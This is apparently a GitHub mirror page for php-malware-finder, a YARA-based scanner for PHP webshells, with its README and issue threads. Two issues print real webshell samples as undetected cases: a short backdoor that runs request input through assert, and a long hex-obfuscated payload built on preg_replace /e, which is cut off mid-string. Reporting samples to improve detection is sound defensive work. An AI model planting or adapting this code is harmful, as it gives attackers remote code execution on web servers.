jvoisin / php-malware-finder Goto Github PK

Detect potentially malicious PHP files

License: GNU Lesser General Public License v3.0

Makefile 0.13% Shell 0.65% Python 0.59% PHP 73.07% YARA 24.43% Go 1.08% Dockerfile 0.05%

yara php malware webshell antivirus

php-malware-finder's Introduction

PHP Malware Finder

 _______  __   __  _______
|  ___  ||  |_|  ||       |
| |   | ||       ||    ___|
| |___| ||       ||   |___   Webshell finder,
|    ___||       ||    ___|   kiddies hunter,
|   |    | ||_|| ||   |		website cleaner.
|___|    |_|   |_||___|

Detect potentially malicious PHP files.

What does it detect?

PHP-malware-finder does its very best to detect obfuscated/dodgy code as well as files using PHP functions often used in malwares/webshells.

The following list of encoders/obfuscators/webshells are also detected:

Of course it's trivial to bypass PMF, but its goal is to catch kiddies and idiots, not people with a working brain. If you report a stupid tailored bypass for PMF, you likely belong to one (or both) category, and should re-read the previous statement.

How does it work?

Detection is performed by crawling the filesystem and testing files against a set of YARA rules. Yes, it's that simple!

Instead of using a hash-based approach, PMF tries as much as possible to use semantic patterns, to detect things like "a $_GET variable is decoded two times, unzipped, and then passed to some dangerous function like system".

Installation

From source

Install Go >= 1.17 (using your package manager, or manually)
Install libyara >= 4.2 (using your package manager, or from source)
Download php-malware-finder: git clone https://github.com/jvoisin/php-malware-finder.git
Build php-malware-finder: cd php-malware-finder && make

or replace the last 2 steps with go install github.com/jvoisin/php-malware-finder, which will directly compile and install PMF in your ${GOROOT}/bin folder.

How to use it?

$ ./php-malware-finder -h
Usage:
  php-malware-finder [OPTIONS] [Target]

Application Options:
  -r, --rules-dir=      Alternative rules location (default: embedded rules)
  -a, --show-all        Display all matched rules
  -f, --fast            Enable YARA's fast mode
  -R, --rate-limit=     Max. filesystem ops per second, 0 for no limit (default: 0)
  -v, --verbose         Verbose mode
  -w, --workers=        Number of workers to spawn for scanning (default: 32)
  -L, --long-lines      Check long lines
  -c, --exclude-common  Do not scan files with common extensions
  -i, --exclude-imgs    Do not scan image files
  -x, --exclude-ext=    Additional file extensions to exclude
  -u, --update          Update rules
  -V, --version         Show version number and exit

Help Options:
  -h, --help            Show this help message

Or if you prefer to use yara:

$ yara -r ./data/php.yar /var/www

Please keep in mind that you should use at least YARA 3.4 because we're using hashes for the whitelist system, and greedy regexps. Please note that if you plan to build yara from sources, libssl-dev must be installed on your system in order to have support for hashes.

Oh, and by the way, you can run the comprehensive testsuite with make tests.

Docker

If you want to avoid having to install Go and libyara, you can also use our docker image and simply mount the folder you want to scan to the container's /data directory:

$ docker run --rm -v /folder/to/scan:/data ghcr.io/jvoisin/php-malware-finder

Whitelisting

Check the whitelist.yar file. If you're lazy, you can generate whitelists for entire folders with the generate_whitelist.py script.

Why should I use it instead of something else?

Because:

It doesn't use a single rule per sample, since it only cares about finding malicious patterns, not specific webshells
It has a complete testsuite, to avoid regressions
Its whitelist system doesn't rely on filenames
It doesn't rely on (slow) entropy computation
It uses a ghetto-style static analysis, instead of relying on file hashes
Thanks to the aforementioned pseudo-static analysis, it works (especially) well on obfuscated files

Licensing

PHP-malware-finder is licensed under the GNU Lesser General Public License v3.

The amazing YARA project is licensed under the Apache v2.0 license.

Patches, whitelists or samples are of course more than welcome.

php-malware-finder's People

Contributors

Stargazers

Watchers

Forkers

xxorax duke-cheng cloudxtreme mescanef lazy404 gallart gdelpierre blackice2999 fo0nikens dubya-dubya-dubya paran0ids0ul signedbytes codecrack3 liwianwpio hslatman cyberwatch gmlanzi securityigi lucabongiorni jinglingshu ksmaheshkumar nanght reality9 thomasjpatterson chikatambun cinno akagisho liluxdev 2xyo mikalv sanguinarius jody-frankowski webclinicpro coffeehb safe3 hanicker redteamcaliber shark0der h4ck3root pabit crazykid199 otetard chennqqi beejhuff triplekill y0d4a peymannaeimi enjoy2000 esc0rtd3w noobzero mrmugiwara feixuezhi ellipsys idkwim rjerrin noobfromvn avaussant palaniyappanbala cybershieldconsulting shekkbuilder virtualadrian av1080p qiji2015 joinbaijun haoirui m1yt stayliv3 ch0ck iicoming sun9git jijicanyu whxloveyrh sparkinzy ddosser yaofeifly songofhack 1sn0m4d shuyabin xxoxx sec-u wolft akpotter binddns xiju2003 feiyang666 kuteminh11 v1cker 0thm4n3 liamkarlmitchell dylangywu dhruvangekarsh whiled0ne poyop philpep avgirl gitter-badger simlan skmezanul angelzwing husoul

php-malware-finder's Issues

Option to exclude images/specific filetypes

It would be helpful if it were possible to exclude certain filetypes from the malware scan. I am seeing a lot of false positives generated by uploaded image files in a Wordpress install, for example.

Filename with spaces

Filename with spaces don't work anymore

#:~/php-malware-finder/php-malware-finder#` mkdir /tmp/test/
#:~/php-malware-finder/php-malware-finder# touch "/tmp/test/salut bobby.php"
#:~/php-malware-finder/php-malware-finder# ./phpmalwarefinder -v /tmp/test/
wc: /tmp/test/salut: No such file or directory
wc: /tmp/test/salut: No such file or directory
wc: bobby.php: No such file or directory
wc: bobby.php: No such file or directory

Makefile still referring to malwares.yara

With the commit e3b724a malwares.yara has been split up, but the Makefile, the debian packaging , and even README.md still referring to it.

Unable to find yara in your PATH, and in the current directory.

When i run ./phpmalwarefinder -h

i get following error

Unable to find yara in your PATH, and in the current directory.

Undetected sample: 'awvjtnz'

Sample is attached here:
https://gist.github.com/robbat2/f3e62e360f7eb1dab1a02c1e535039b8

Suggested detection:
Look for large strings that contain a string-reversed create_function, but be sure to check case-insensitive.

Provide file context/snippet with the code that triggered the alert

I've had previously infected wordpress websites that I had to cleanup. I always get a clean version and will reinstall all the plugins but would have to manually clean a custom theme or plugin and would heavily use grep looking for eval, backticks, preg_replace with e flag etc. This project would be a nice alternative for that part of the process however I just tried running this against a freshly downloaded wordpress and got a few false positives:

$ ./phpmalwarefinder ../wordpress/
DodgyPhp ../wordpress//wp-admin/includes/schema.php
ObfuscatedPhp ../wordpress//wp-admin/includes/template.php
ObfuscatedPhp ../wordpress//wp-admin/includes/class-ftp.php
DodgyPhp ../wordpress//wp-includes/load.php
DodgyPhp ../wordpress//wp-includes/functions.php
ObfuscatedPhp ../wordpress//wp-includes/class-IXR.php
DodgyPhp ../wordpress//wp-includes/class-pop3.php
DodgyPhp ../wordpress//wp-includes/ID3/getid3.lib.php
DodgyPhp ../wordpress//wp-includes/ID3/getid3.php
ObfuscatedPhp ../wordpress//wp-includes/ID3/module.tag.id3v2.php
ObfuscatedPhp ../wordpress//wp-includes/ID3/module.audio-video.matroska.php
DodgyPhp ../wordpress//wp-includes/class-phpmailer.php
ObfuscatedPhp ../wordpress//wp-includes/formatting.php
ObfuscatedPhp ../wordpress//wp-includes/js/tinymce/tinymce.min.js
DodgyPhp ../wordpress//wp-includes/random_compat/random.php

While I understand that false positives will always happen and I'd rather have a false positive than a false negative, it would be really useful to show the lines of code that triggered it so I can investigate it myself.

php.yar line 44 grabbing legit newline-tab-tab

I'm not good with regex, but i'm seeing false positives for php with simple "/x0d/x09/x09" , especially indented functions, etc.

Better information / context in output

Similar to #39 it would be great if the tool were to output some more context.

E.g. line number (if possible) of hits, or snippets of code from file that matched the rule in question. I am not sure if this is possible, but it would be a helpful addition.

It can be quite the challenge to sort through the noise on a large site with many themes and plugins. I have (through limited trial and error) found that e.g. a hit with subsequent ObfuscatedPhp and also a DodgyPhp on a file is a good hint something is wrong (or just multiple hits on the same file, in general).

Also I've seen SuspiciousEncoding be a good indicator of bad stuff - however this is not one of the flags you pick out for your (in your own words "hacky") You should take a look at the files listed below section.

So yeah, some more context, or some more "intelligent" rules for your recommended section would be awesome 👍

Check this batch of samples

It would be nice to check that those samples are correctly detected.

invalid regular expression in malwares.yara

Hi, running latest PMF against some CMS to create whitelists, I got :

/usr/pkg/etc/phpmalwarefinder/malwares.yara(67): error: invalid regular expression "$too_many_chr": syntax error, unexpected '?', expecting $end

Commenting this first issue got me another one :

/usr/pkg/etc/phpmalwarefinder/malwares.yara(68): error: invalid regular expression "$b64_concat": syntax error, unexpected '?', expecting $end

Can you please correct them ?

Undetected sample

<?php 
ob_start(function ($c,$d){register_shutdown_function('assert',$c);}); 
echo $_REQUEST['pass']; 
ob_end_flush(); 
?>

What can we do about this?

unknown module and invalid field name when run phpmalwarefinder

I compiled yara 3.4.0, but php-malware-finder still doesn't work :(

➜  php-malware-finder git:(master) yara -v                                                  20:20:15
yara 3.4.0
➜  php-malware-finder git:(master) ./phpmalwarefinder  .                                    20:20:17
./malwares.yara(1): error: unknown module "hash"
./whitelist.yara(10): error: invalid field name "sha1"
./whitelist.yara(23): error: invalid field name "sha1"
./whitelist.yara(32): error: invalid field name "sha1"
./whitelist.yara(52): error: invalid field name "sha1"
./whitelist.yara(66): error: invalid field name "sha1"
./whitelist.yara(79): error: invalid field name "sha1"
./whitelist.yara(88): error: invalid field name "sha1"
./whitelist.yara(102): error: invalid field name "sha1"
./whitelist.yara(113): error: invalid field name "sha1"

`Ubuntu 14.04 (x86_64)

whitelist.yara(10): error: undefined identifier "hash"

While running yara -r ./phpmalwarefinder /home/USER/public_html/site/, I got the following error:

./phpmalwarefinder /home/USER/public_html/site/
TooShort /home/USER/public_html/site/something/index.php
./malwares.yara(1): error: syntax error, unexpected IDENTIFIER, expecting $end or RULE or PRIVATE or GLOBAL
whitelist.yara(10): error: undefined identifier "hash"
whitelist.yara(27): error: undefined identifier "hash"
whitelist.yara(63): error: undefined identifier "hash"
whitelist.yara(72): error: undefined identifier "hash"
whitelist.yara(92): error: undefined identifier "hash"
whitelist.yara(116): error: undefined identifier "hash"
whitelist.yara(129): error: undefined identifier "hash"
whitelist.yara(138): error: undefined identifier "hash"
whitelist.yara(152): error: undefined identifier "hash"
whitelist.yara(163): error: undefined identifier "hash"
whitelist.yara(170): error: undefined identifier "Symfony"
./malwares.yara(71): error: invalid regular expression "$too_many_chr": syntax error, unexpected '?', expecting $end
./malwares.yara(129): error: undefined identifier "IsWhitelisted"
./malwares.yara(188): error: undefined identifier "IsWhitelisted"
./malwares.yara(251): error: undefined identifier "IsWhitelisted"
./malwares.yara(283): error: undefined identifier "IsWhitelisted"

I have complete rights to scan in it, if thats the problem:

sudo chown -R USER:USER /home/USER/public_html
sudo chmod -R 775 /home/USER/public_html

I also submitted this error on the yara github page:

https://github.com/plusvic/yara/issues/426

output when scanning directory has a double slash

As written in this article :
https://dfir.it/blog/2016/12/07/webshells-rise-of-the-defenders-part-4/

When scanning a directory with PMF, the output has a double slash because yara concatenates it to the files and subdirs. This can lead to duplicates when trying to compare results to other outputs. So the lasting slash should be trimmed.

php.yar eval false positive on doubleval function calls.

doubleval($_POST[$index]);

But its not eval($_POST) just looks like it.

DangerousPhp on Prestashop internals

There is a false postive test on prestashop/tools/htmlpurifier/HTMLPurifier.standalone.php

./whitelists/custom.yar(12): error: syntax error, unexpected _IDENTIFIER_

As of 6cf5148 make tests crashes.

Step 21 : RUN make tests
 ---> Running in 8d2095e0ccd2
./whitelists/custom.yar(12): error: syntax error, unexpected _IDENTIFIER_
./whitelists/custom.yar(16): error: unterminated regular expression
[-] 0x294d:$eval: {eval( was not detected in cpanel.php, sorry
Makefile:5: recipe for target 'tests' failed
make: *** [tests] Error 1
The command '/bin/sh -c make tests' returned a non-zero code: 2
ERROR: Build failed: exit code 1

See full log here: https://lw-scm.de/lipperts-web/docker-pmf/builds/2991

In Version 0.3.1 that worked perfect:

Step 21 : RUN make tests
 ---> Running in fbf8ddb71df3
[+] Congratz, the 54 tests succeeded!
 ---> 7ad857656951

undetected pattern

As seen today, seems (surprisingly) undetected by pmf :

<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $uahzsvtxsn = 'x5c%x7827)fepdof.)fepdof.%x5c%x782f#@#%x5c%x782y]27]28y]#%x5c%x782fr%x5c%x7825%x5c%x782fh]y31]53]y6d]281]y43]78]y33]65]y31]55]y85]82]y76]62]y3:]84#-!OVMM<#65,47R25,d7R17,67R37,#%x5c%x782fq%x5c%x7825>6767~6<Cw6<pd%x5c%x7825w6Z6<.5%x5c%x7860hA%x5c%x5c%x7825:<**#57]38y]47]67y]37]887827pd%x5c%x78256<pd%ojneb#-*f%x5c%x7825)sf%x5c%|!*nbsbq%x5c%x7825)323ldfidk!~!<**qp%x5c%x7825!-uyr#%x5c%x785cq%x5c%x78257**^#zsfvr#%x5c%xgoj{h1:|:*mmvo:>:iuhofm%x5c%x7825:-5ppde:4:|:**#ppd5mm)%x5c%x7825%x5c%x7878:-!%x5c%x782ubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*9!%x5c%x7827!hmg%x5c%xc6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GUPNFS&d_SFSFGFS%x5c%x7860QUUI&c_P6L1M5]D2P4]D6#<%x5c%x7825G]y6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]55Ld]24<!%x5c%x7825tzw>!#]y76]277]y72]265]y39]274]y85]273]y6g5c%x785cq%x5c%x78257%x5c%x782f7#@#7%x5c%7825)!gj!~<ofmy%x5c%x7825,3,j%x5c%x7825>j%x5c%%x5c%x7825j:=tj{fpg)%x5c%x7825s:*<%x55)Rd%x5c%x7825)Rb%x5c%x7825))!gj!<*#cd2bge56+99386fqp%x5c%x7825>5h%x5c%x7825!<*::::::-111112)eobs%x5c%x7860un>qp%156%x75%156%x61"])))) { $:8:|:7#6#)tutjyf%x5c%x7860439275ttfsqnpdov{h19275j{hnpd19275fubm25nfd)##Qtpz)#]341]88%x785csboe))1%x5c%x782f35.)1%x5c%x782f14+9**-)1%x5c%x782.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf%x5c%x7827*&7-n%x5c%x7825)utjm6<%-%x5c%x7824%x5c%x785c%x5c%x7825j^%x5c%x7824-%x5c%x782opo#>b%x5c%x7825!**X]275]D:M8]Df#<%x5c%x7825tdz>#L4]275L3]248L3eturn chr(ord($n)-1);} @error_reporting(0); preg_repl%x782f%x5c%x7825kj:-!OVMM*<(<%x5c%x78e%x5c%x78b%x5c%x7825ggf2986+7**^%x5c%x782f%x5c%x7825r%x5c%x7878<~!!%x5c%x7825s:%x5c%x7825b:>1<!fmtf!%x5c%x7825b:>%x5c%x7825s:%x5c%x785c%x5c%x782g!>!#]y81]273]y76]258]y6g]273]y76]271]y7d]252]y75c:>1<%x5c%x7825b:>1<!gps)%x5c%x7825j:>1<p#%x5c%x782f#p#%x5c%x782f%x5c%x7825z<jg!)%x5c%x7%x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6e#)tutjyf%x5c%x78604%x5c%x78223}!+!<+{e%x5c%x7825+*!*25:osvufs:~928>>%x5c%x7822:ftmbg39*56A:>8]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]x5c%x7825)sf%x5c%x7878pmpusut!-#j0#!%x5c%x782f!**#sfmcnbs+yfeobz+3%x74%162%x5f%163%x70%154%x69%164%50%x22%134%x78%62%x35%165%x3a%146%x2825h>#]y31]278]y3e]81]K78:56985:6197g:74985-rr.93e:5597f-s.973:82R#>q%x5c%x7825V<*#fopoV;hojepdoF.uofuopD#)sfebfI{*w%x5c%x7825jgA%x5c%x7827doj%x5c%x78256<%x5c%x787fw6*%x5c52]y85]256]y6g]257]y86]267]y74]275]y7:]268]y7f#<!%x5c%x7825t%x7825j,,*!|%x5c%x7824-%x5c%x7824gvodujpo!%x55)!gj!<**2-4-bubE{h%x5c%x7825)sutcvtG#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*%x5c%x7824%x5c%x7825cB%x5c%x7825iN<.2%x5c%x7860hA%x5c%x7827pd%x5c%x78pd%x5c%x782f#)rrd%x5c%x782f#00;quui#>.%x5c%x7825!>>}R;msv}.;%x5c%x782f#%x5c%x782f#%x5c%x782f},;#-#}+;%x5c%782f#0#%x5c%x782f*#nx7825V%x5c%x7827{ftmfV%x5c%x787f<*X&Z&S{23zbe!-#jt0*?]+^?]_%x5c%x785c}X%x5c%x787-NBFSUT%x5c%x7860LDPT7-UFOJ%x5c%x7860GB)fubfsdXA%x5c%x7827K6<%x5c%xx7825!<**3-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt-#w#)ldbqov>*ofmy%x5c%x5c%x7825)n%x5c%x7825-#+I#)q%x5c%x7825:>:r%x5c%x7825:|:**t%x5c%x7827k:!ftmf!}Z;^nbsbq%x782f7^#iubq#%x5c%x785cq%x5c%x7825%x5c%x7827jsv%x5c%x78256<C>^#zsfv;h!opjudovg}{;#)tutjyf%x5c%x7860opjudovg)!gj!|!*msv%x5c%x7825)}25-#jt0}Z;0]=]0#)2q%x5c%x7825l}S;2-5j:.2^,%x5c%x7825b:<!%x5c%x7825c:>%x5c%x7825s:%x5c%x785c%x5c%x78825:osvufs:~:<*9-1-r%x5c%x7825)s%x5c%x7825>%x5c%x782fh%xN}#-%x5c%x7825o:W%x5c%x782#%x5c%x782f#M5]DgP5]D6#<%x5c%x7825fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4<&w6<%x5c%x787fw6*CW&)7gj6<.[A%x5c%x7%x5c%x7825wN;#-Ez-1H*WCw*[!%x5c%x7825rN}#f%x5c%x7860gvodujpo)##-!#~<#%x5c%xif((function_exists("%x6f%142%x5fx7825-qp%x5c%x7825)54l}%x5c%x7827;%x5c%x7878X6<#o]o]Y%x5c%x78257;utpI#7>%x5c%x782f7rfs%x5c%x78256fw6*CW&)7gj6<*doj%x5c%x78257-C)fepmqnjA%x5c%x7827&6<.fmA!osvufs!~<3,j%x5c%x7825>j%x5c%x7825!*3!%x5c%x7827!hmg%x5c%x784tvctus)%x5c%x7825%x5c%x7824-%x+A!>!{e%x5c%x7825)!>>%x5c%x7822!ftmbg)!gj<*#k#)usbut%x5c%x7GLOBALS["%x61%156%x75%156%x61"]=1; function fjfgg($n){r5tzw%x5c%x782f%x5c%x7824)#P#-#Q#-#B#-#T#-#E#-#c%x7825j:,,Bjg!)%x5c%x7825j:>>1*!81#%x5c%x782f#7e:559~6<u%x5c%x78257>%x5c%x782f7&6|7**111127-K)ebfsX%x5y]572]48y]#>m%x5c%x7825:|:*r%x5c%x7825:-t%x5c%x7825)3of:opjudovg<>:h%x5c%x7825:<#64y]552]e7y]#>n%x5c%x7825<#372]58y]472]37y]672]48y]c%x7825h!>!%x5c%x7825tdz)%x5c%x7825bbT-%x5c%x7825bT-%x5c%x%x5c%x7825!>!2p%x5c%x7825!*3>?*2b%x5c%x7825)gpf8%151%x6d%160%x6c%157%x64%146<**2qj%x5c%x7825)hopm3qjA)qj3hopmA%x5c%x78273qj%x5c%x78256<*Y%x50ftsbqA7>q%x5c%x78256<%x5c%x787fw6*%x5c%x787x7878pmpusut)tpqssutRe%x5c%x782fuopd%x5c%x7860ufh%x5c%x7860fmjg}[;ldpt%x5c%x7825}K;%x5c%x76*CWtfs%x5c%x7825)7gj6<*id%x5c%x7825)ftpmdR6<*ix7825!<*#}_;#)323ldfid>}&;!osvufs}%x5c%x787f;!opjudovg}k~~9{d%x5c%x785]274]y4:]82]y3:]62]y4c#<!%x5c%x7825t::!>!%x5c%x7824Ypp3)%x5c256<pd%x5c%x7825w6Z6<.3;opjudovg}%x5c%x7878;0]=])0#)U!%x5c%x7827{**u%x5c%x78c%x7827u%x5c%x7825)7fmji%x5c%x78786<C%j%x5c%x7825-bubE{h%x5c%x7825)sutcvt)fubmgoj{h]g2y]#>>*4-1-bubE{h%x5c%x782M4P8]37]278]225]241]334]368]322]3]364]6]283]427]36]373P6]36]73]83]23s-%x5c%x7825r%x5c%x7878B%x5c%x7<%x5c%x787fw6*%x5c%x787f_*#ujojRk3%x5c%x7860{666~67825z!>2<!gps)%x5c%x7825j>1<%x5c%x7825j=6[%x5c%x7825ww2!>#c%x7824-%x5c%x7824y7%x5c%x7824-%x5c%x78860cpV%x5c%x787f%x5c%x787f%x5c%x787f%x5c%x787f<u%x5c%25j>1<%x5c%x7825j=tj{fpg)%x5c%x7825%x5c%x7824-%x5c%x7824*<!~!dsfbu5c%x78256~6<%x5c%x787fw6<*K)ftpmdXA6|7**197-2qj%x5c%163%x74%141%x72%164") && (!isset($GLOBALS["%x61f_*#fubfsdXk5%x5c%x7860{66~6<&w6<%x5c%x787d%x5c%x7825)dfyfR%x5c%x7827BSUOSVUFS,6<*msv%x5c%x78257-MSV,6<*)ujojR%x5c%x7827id%x5c%x782565c%x7824b!>!%x5c%x7825yy)#}#-#%x5c%x7824-%x5c%x782482#<!%x5c%x7825tjw!>!#]y84]275]y83]248]y83]256]y81]c%x7825hOh%x5c%x782f#00m%x5c%x7825):fmji%x5c%x7878:<##:~!}%x5c%x787f;!|!}{;)gj}l;33bq}k8M7]381]211M5]67]452]88]5]48]32M3]317]445]212]445]43]321]464]284]363g]61]y3f]63]y3:]68]y76#<%x5c%x78e%x5c%x78b%x5c%x7825w:!>!%x5c%x7824%x7825r%x5c%x785c2^-%x5U<#16,47R57,27R66,#%x5c%x782fq%x5c%4*<!%x5c%x7825kj:!>!#]y3d]51]y35]256]y76]72]y3d]51]y3+fepdfe{h+{d%x5c%x7825)+opjudovg+)!gj+{e%x5c%x7825!osvufs!*!7825hW~%x5c%x7825fdy)##-85cq%x5c%x7825%x5c%x7827Y%x5c%x78256<.msv%x5c%x786x5c%x7827;!>>>!}_;gvcmbdf)%x5c%x7825%x5c%x7824-%x5c%x7824y4%x5c%x7824-%x5c%x7824]7825Z<#opo#>b%x5c%x7825!*##>>X)!gjZ<#256<C%x5c%x7827pd%x5c%x78256|6%x7825!<5h%x5c%x7825%x5c%x%x5c%x7825z>2<!%x5c%x7825ww2)%x5c%x7825w%x5c%x7860T]Kc#<%x5c%x7825tpz!>!#]D6M7]K3#<%x5c%x7825yy>#]D6]281L1W~%x5c%x7824<%x5c%x78e%x5c%x78b%x5c%x782%x5c%x7825fdy<Cb*[%x51%76%x21%50%x5c%x7825%x5c%x7878:!>#]y!#~<%x5c%x7825h00#*<%x5c%x78]273]y76]271]y7d]252]y74]25697f:5297e:56-%x5c%x7878r.985:52985-t.925j:^<!%x5c%x7825w%x5c%x7860%x5c%x785c^>Ew:Qb:Qc:W~!%x5c%x%x5c%x7825!|Z~!<##!>!2p%x5c%x7825!|!*!***b%f2!>!bssbz)%x5c%x7824]25%x5c%x7824-%x5c%x7824-!%x%x7860%x5c%x7825}X;!sp!*#opo#x5c%x7825w6Z6<.4%x5c%x7860hA%x5c%x7827pd%x5c%x78x5c%x7827&6<*rfs%x5c%x78257-K)fujs%x5c%7825)!gj!<2,*j%x5c%x7825-#1]#-b265]y72]254]y76#<%x5c%x7825tmw!>!#]y84]275]y83]273]y76]277#<%x5c%MFT%x5c%x7860QIQ&f_UTPI%x5c%x7860QUUI&e_SEEB%x5c%x7860F%x7825)utjm!|!*5!%x5c%x7827!hmg%x5c%x7825)!gj!|!*1?hmg%x5c%x7824]256#<!%x5c%x7825ggg)(0)%x5c%x782f+*0f(-!#]y76]277]y72]265]y39]27x7825t2w>#]y74]273]y76]2825tmw)%x5c%x7825tww**WYsboepn)%x5c%x7825bsfu%x5c%x7825)3of)fepdof%x5c%x786057ftbc%x5c%x787f!|!*uyfu%x5c#>s%x5c%x7825<#462]47y]252]18y]#>q%x5c%x7825<#762]67y]562]385)sutcvt)!gj!|!*bubE{h%x5c%x7825)j}#-!tussfw)%x5c%x7825c*W%x5c%x7825eN+#Qi%x5c%x785cc%x7825r%x5c%x7878W~!Ypp2)%x5c%x7825zB%x5c%x7825z>!tustfs%x5c%x78256<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTO4]6]234]342]58]24]31#-%x5c%x7825tdz*Wsfuvso!%x5c%x7825bss%x5c<***f%x5c%x7827,*e%x5c%x7827,*d%x5c%x7827,*c%x5c%x7827,*b%~%x5c%x7824<!%x5c%x7825o:!>!%x5c%x78242178}527}88:}ace("%x2f%50%x2e%52%x29%57%x65","%x65%166%x61%154%x2x7825>2q%x5c%x7825<#g6R85,67R37,18%x78257-K)udfoopdXA%x5c%x7822)7gj6<*QDU%x5c%x7860MPT*<%x22%51%x29%51%x29%73", NULL); })ufttj%x5c%x7822)gj!ftmfV%x5c%x787f<*XAZASV<*w%x5c%x7825)ppde>u%x5c%x7825V1]y83]256]y78]248]y83]256]y81]265]y72]254]y76]61]y33]68]y34]68]y33]65%x5c%x7825}&;ftmbg}%x5cy8%x5c%x7824-%x5c%x7824]26%x5c%x7824-%x5c%x7824<%x5cx5c%x787fw6*CW&)7gj6<*K)ftpmdXA6sfwjidsb%x5c%x7860bj+upcotn+qsvmt+fmhpph#)zbd%x5c%x7825)uqpuft%x5c%x7860msvd},;uqpuft%x5c%x7860msvd}+;!>!}%827&6<%x5c%x787fw6*%x5c%x787f_*#[k785cq%x5c%x7825)ufttj%x5c%x7822)gj6<^#Y#%x5c%x7x5c%x7825!|!*)323zbek!~!<b%x5c%x7825%x5c%x787f!<X>b%x5c%xQwTW%x5c%x7825hIr%x5c%x785c1^-%x5c{jt)!gj!<*2bd%x5c%x7825-#1GO%x5c%x7822#)fepmqyfA>2b%x5c%x782ww!>!%x5c%x782400~:<h%x5c%x7825_t%x5c%x7x5c%x7825%x5c%x785cSFWSFT%x5c8]y6g]273]y76]271]y7dsfw)%x5c%x7825zW%x5c%x7825h>EzH,2W5!<*qp%x5c%x7825-*.%x5c%x7825)euhA)3of>2bd%x5cx5c%x785c2^<!Ce*[!%x5c%x782)esp>hmg%x5c%x7825!<12>j%x5c%x7825!|!*#91y]c9y%x78272qj%x5c%x78256<^#zsfvr#%x334}472%x5c%x7824<!%x5c%x7825mm!>!#]y81]273]y76]255%x28%141%x72%162%x61%171%x5f%155%x61%160%x28%42%x66%15gj}1~!<2p%x5c%x7825%x5c%x787f!~!<##!>!2p%x5c%x7825Z<^2%x5c%x785c2b#W~!%x5c%x7825t2w)##Qtjw)#]82#-#!#-%x5c%x75c%x7825%x5c%x7824-%x5c%x7824*!|!%x5c%x7824%x7825)m%x5c%x7825=*h%x5c%x7825)u%x5c%x7825!-#2#%x5c%x782f#%x5c%x7825#%x5c%x782f#o]#%x5c%x782f*)3<#o]1%x5c%x782f20QUUI7jsv%x5c%x78257UFH#%x5c%x7827rfs%xUOFHB%x5c%x7860SFTV%x5c%x7860QUUI&b%2%x66%147%x67%42%x2c%162%x5c%x7860{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuo-tusqpt)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x7824!>!tus%x5c%x7860sfq%x787f_*#fmjgk4%x5c%x7860{6~6<tfs%x5c%x7825w6<%x5c%x787fw1^W%x5c%x7825c!>!%x5c%x7825i%)kV%x5c%x7878{**#k#)tutjyf%x5c%x7860%x5c%x7878%x5c%x7825z>>2*!%x5c%x7825z>3<!fmtf!k~~~<ftmbg!osvufs!|ftmf!~<**9.-24*<!%x5c%x7824-%x5c%x7824gps)%x5c%x7825!)!gj!<2,*j%x5c%x7825!-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%782f%x5c%x7825%x5c%x7824-%x5c%x7824!>!fyqmpef)#%x5c%x782ssb!-#}#)fepmqnj!%x5c%x782f!#0#)idubn%x5c%x7860hfsq)!sp!*#]y39]252]y83]273]y72]25cIjQeTQcOc%x5c%x782f#00#W~!Ydrr)%x5c%x7825r%x5c%x7878Bsfuvso!sbc%x7825)fnbozcYufhA%x5c55#*<%x5c%x7825bG9}:}.}-}!#*<%x5c%x7825nfd>822l:!}V;3q%x5c%x7825}U;y]}R;2]},;osvufs}%x5c%x7827;mnui}&;zepc}A;860ufldpt}X;%x5c%x7860msvd}R;*msv%x5c%x7825)}.;%x5c%x7860UQPMSVD!-i787fw6*3qj%x5c%x78257>%x5c%x782272qj%x5c%x7825)7gj{hnpd!opjudovg!|!**#j{hnpd#)tutjyf%x5c%x7860opjudovg%x5c%x7822)!oepn)%x5c%x7825epnbss-%x546-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53%x787f;!osvufs}w;*%x5c%x787f!>>%x5c%x7822!pd%x5c%x7825)!gj}Z]252]y74]256#<!%x5c%x7825fx7825!*72!%x5c%x7827!hmg%x5c%x/(.*)/epreg_replaceubosazcmdw'; $zcxhrsvrrm = explode(chr((140-96)),'3390,33,5175,48,992,26,3727,55,1345,53,7491,52,4168,28,8576,55,8970,23,1970,70,6266,37,5612,68,199,48,279,21,6576,48,4572,23,1716,52,2437,35,6043,30,1159,70,7881,32,3881,50,4648,38,6624,39,3462,58,8879,55,5124,51,7577,52,2677,68,9797,50,4196,65,9598,23,8495,31,757,40,2899,67,377,40,8054,47,5875,50,4261,44,5223,42,3520,55,2166,45,9101,57,4395,47,5265,27,7269,52,5292,64,4858,50,3278,37,8020,34,8993,44,4336,59,9730,67,7957,63,5925,21,7806,23,9990,60,2966,63,9269,31,4686,45,3575,62,9338,60,10076,30,6663,31,504,58,797,46,2745,67,6814,63,2316,36,8449,46,4731,28,7131,34,9847,64,8631,66,4121,47,8192,60,8376,46,6073,26,2578,20,2472,49,7382,58,0,47,930,62,6455,43,1905,65,7913,44,9454,58,300,27,4305,31,880,50,562,39,6759,55,601,32,8934,36,8101,57,6006,37,1282,20,7663,20,327,50,7010,61,2875,24,8292,29,6547,29,2521,57,3423,39,4442,69,1821,40,1018,64,417,51,1768,53,5791,60,3668,59,5005,53,2598,40,7683,54,153,46,5703,35,7543,34,2105,61,9187,53,9664,66,5513,32,4595,53,3029,35,8814,65,2638,39,701,56,6331,28,9512,22,5407,51,6694,65,6943,24,2211,60,8252,40,3128,56,247,32,47,42,2812,63,8782,32,5481,32,3996,67,70